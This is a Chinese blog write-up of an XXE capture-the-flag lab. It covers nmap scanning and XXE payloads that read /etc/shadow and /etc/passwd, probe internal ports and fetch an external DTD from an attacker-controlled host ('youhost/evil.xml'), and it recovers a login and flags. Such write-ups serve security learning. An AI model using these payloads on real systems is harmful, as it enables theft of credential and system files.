xxe靶机

其他 2020-03-19 17:31:01 阅读次数: 0

开始之前先回忆一下nmap

一直都知道nmap功能很强大,但是平时工作中就只用来扫描端口,渐渐的都忘记了其它的功能及使用方法,正好今天做靶场需要用nmap进行存活主机发现,总结下nmap的使用方法。

场景一:主机发现

nmap -sP 192.168.44.0/24    使用ping命令来发现存活主机

场景二:端口扫描

nmap -v -sV -p- 192.168.44.138 

再学习一下xxe

DTD是XML的构建模块。一般都是在XML文件内部声明,但是也可以外部引用,外部引用这就容易出问题了。

引用外部DTD的格式

<!DOCTYPE 根元素 SYSTEM "文件名">

<?DOCTYPE 根元素 PUBLIC "public_ID""文件名">

引用外部实体

<!ENTITY 实体名称 SYSTEM "URI">

<!ENTITY 实体名称 PUBLIC "public_ID""URI">

XML外部实体注入(XML External Entity)

当允许引用外部实体时,通过恶意构造,可导致

1,任意文件读取

<!DOCTYPE example [<!ENTITY xxe SYSTEM "file:///etc/shadow">]>

<root>&xxe;</root>

2,执行系统命令

3,探测内网端口

http://192.168.0.145:65412/?xml=<!DOCTYPEexample [<!ENTITY xxe SYSTEM"http%3A%2f%2f192.168.0.145%3A22%2f123">]><root>%26xxe%3B<%2Froot>

4,攻击内网网站

但是不同的程序支持的协议不一样,可以利用这些伪协议完成上述的利用:

libxml2:file http ftp

php:file http ftp php compress.zlib compress.bzip2 data glob phar

java:http https ftp file jar netdoc mailto gopher *

.NET:file http https ftp

挖掘流程:

1,检测XML是否会被解析

[html] view plain copy

<?xml version=”1.0” encoding=”UTF-8”?> 
<!DOCTYPE ANY [  
<!ENTITY test “this is test”> 
]>

<root>&test;</root>

如果$test;变成了”this is test”,那就继续第二步。

(2)检测服务器是否支持外部实体:

[html] view plain copy

1. <?xml version=”1.0” encoding=”UTF-8”?> 
2.   <!DOCTYPE ANY [  
3.   <!ENTITY % shit SYSTEM “http://youhost/evil.xml”> 
4.   %shit;  
5.   ]>

通过查看自己服务器上的日志来判断,看目标服务器是否向你的服务器发了一条请求evil.xml的HTTP request。

(3)如果上面两步都支持,那么就看能否回显。如果能回显,就可以直接使用外部实体的方式进行攻击。当然有时候服务器会不支持一般实体的引用,也就是在DTD之外无法引用实体,如果这样的话,只能使用Blind XXE攻击。

(4)如果不能回显,毫无疑问,使用Blind XXE攻击方法。

3,发现开启80端口

4,使用dirsearch进行目录扫描

5,访问robots.txt

6,

7,抓包发现了有意思的东西

8,发现可以利用

<?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE r [
            <!ELEMENT r ANY >
            <!ENTITY admin SYSTEM "file:///etc/passwd">
             ]>
<root><name>&admin;</name><password>admin123</password></root>

base64解密之后,发现用户名和密码存在源码当中,MD5解密,发现用户名为admin@123

<?php
   session_start();
?>


<html lang = "en">
   
   <head>
      <title>admin</title>
      <link href = "css/bootstrap.min.css" rel = "stylesheet">
      
     
      
   </head>
    
   <body>
      
      <h2>Enter Username and Password</h2> 
      <div class = "container form-signin">
         
         <?php
            $msg = '';
            if (isset($_POST['login']) && !empty($_POST['username']) 
               && !empty($_POST['password'])) {
                
               if ($_POST['username'] == 'administhebest' && 
                  md5($_POST['password']) == 'e6e061838856bf47e1de730719fb2609') {
                  $_SESSION['valid'] = true;
                  $_SESSION['timeout'] = time();
                  $_SESSION['username'] = 'administhebest';
                  
                echo "You have entered valid use name and password <br />";
        $flag = "Here is the <a style='color:FF0000;' href='/flagmeout.php'>Flag</a>";
        echo $flag;
               }else {
                  $msg = 'Maybe Later';
               }
            }
         ?>
      </div> <!-- W00t/W00t -->
      
      <div class = "container">
      
         <form class = "form-signin" role = "form" 
            action = "<?php echo htmlspecialchars($_SERVER['PHP_SELF']); 
            ?>" method = "post">
            <h4 class = "form-signin-heading"><?php echo $msg; ?></h4>
            <input type = "text" class = "form-control" 
               name = "username" 
               required autofocus></br>
            <input type = "password" class = "form-control"
               name = "password" required>
            <button class = "btn btn-lg btn-primary btn-block" type = "submit" 
               name = "login">Login</button>
         </form>
            
         Click here to clean <a href = "adminlog.php" tite = "Logout">Session.
         
      </div> 
      
   </body>
</html>

使用admin.php当中发现的用户和密码进行登录

点击红色的Flag跳转到404

一猜就知道在xxe目录下

发现很多靶场都要有一个文件包含、文件读取漏洞,必须得读源码才可以,不然就很难做下去,还可以锻炼一下自己的代码审计能力。

所以,使用xxe读取flagmeout.php文件

base64解密发现第一个flag

看着这个flag应该也是编码了,百度下,发现是base32编码

我去,再进行base64解码吧

继续读取/etc/.flag.php源码,base64解码得

$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$À=+_;$Á=$Â=$Ã=$Ä=$Æ=$È=$É=$Ê=$Ë=++$Á[];$Â++;$Ã++;$Ã++;$Ä++;$Ä++;$Ä++;$Æ++;$Æ++;$Æ++;$Æ++;$È++;$È++;$È++;$È++;$È++;$É++;$É++;$É++;$É++;$É++;$É++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$__('$_="'.$___.$Á.$Â.$Ã.$___.$Á.$À.$Á.$___.$Á.$À.$È.$___.$Á.$À.$Ã.$___.$Á.$Â.$Ã.$___.$Á.$Â.$À.$___.$Á.$É.$Ã.$___.$Á.$É.$À.$___.$Á.$É.$À.$___.$Á.$Ä.$Æ.$___.$Á.$Ã.$É.$___.$Á.$Æ.$Á.$___.$Á.$È.$Ã.$___.$Á.$Ã.$É.$___.$Á.$È.$Ã.$___.$Á.$Æ.$É.$___.$Á.$Ã.$É.$___.$Á.$Ä.$Æ.$___.$Á.$Ä.$Á.$___.$Á.$È.$Ã.$___.$Á.$É.$Á.$___.$Á.$É.$Æ.'"');$__($_);
这是个啥,很像以前做过的一个靶场中的ook编码

先百度一下,发现是PHP代码,加上标识符<?php  ?>,找个在线运行PHP代码的环境,运行一下就能得到

到此靶场完成。

shy014
发布了41 篇原创文章 · 获赞 5 · 访问量 1万+
私信 关注

猜你喜欢

转载自blog.csdn.net/qq_32393893/article/details/103991014
xxe
今日推荐
LFOSSA 源来如此公开课 | 掌握云原生未来:CNCF 认证全面攻略与备考秘籍
国产云输入法——仅华为无云端数据上传安全问题
开源日报 | 工业开源项目OGG 1.0;姐姐,你要和我一起配置火狐吗;苹果AI遥遥落后?Fedora 40
开放签电子签章:停止新增,优化体验,前进更进(五一假期前工作)
开源日报 | 中学生开源前端动画引擎;全球首个Llama3 8B中文版开源模型;联想电脑恐出局;Linus讽刺AI炒作
“百模大战”必有一战 | 2024中国“百模大战”竞争格局分析
周排行
Family Tree 题解
BZOJ 1093 最大半连通子图 SCC + DP
幂等处理
Spring----学习(2)----XML 配置Bean 自动装配
SQL Server 远程更新目标表数据
HIbernate3.6 环境搭建
特殊符号正则表达式
【Linux】第一章 进程的理解
843. n-皇后问题(dfs+输出各种情况)
空间数据库2
每日归档
更多
2024-04-26(39)
2024-04-25(22)
2024-04-24(36)
2024-04-23(26)
2024-04-22(39)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)
2024-04-17(5)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022